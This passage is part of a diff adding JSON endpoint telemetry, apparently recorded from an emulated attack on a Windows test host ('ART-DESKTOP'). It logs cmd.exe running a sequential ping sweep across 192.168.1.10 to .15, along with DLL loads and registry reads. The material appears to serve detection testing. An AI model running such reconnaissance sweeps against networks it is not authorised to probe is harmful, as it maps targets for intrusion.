131883572026980000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572026990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "event_type": "process", + "pid": 5688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572031990000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-00100F835101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.10", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 904, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572032130000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 
131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 904, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572032140000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "event_type": "process", + "pid": 904, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572036840000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-00107A855101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.11", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6288, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572036980000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": 
"{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": 
"C:\\Windows\\System32\\mswsock.dll", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572036990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "event_type": "process", + "pid": 6288, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572041990000, + "unique_pid": "{42FC7E13-CB53-5C05-0000-0010F9875101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.12", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572042130000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572041990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { 
+ "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 
1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572042140000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "event_type": "process", + "pid": 1688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572046830000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010788A5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.13", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1340, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572047029984, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": 
"kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1340, + "process_name": "PING.EXE", 
+ "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572046990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572049020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572049020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + 
"timestamp": 131883572049020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 1340, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572051990000, + "unique_pid": "{42FC7E13-CB54-5C05-0000-0010F78C5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.14", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3452, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3452, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + 
"unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "process", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572056840000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.15", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5572, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572056980000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5572, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { 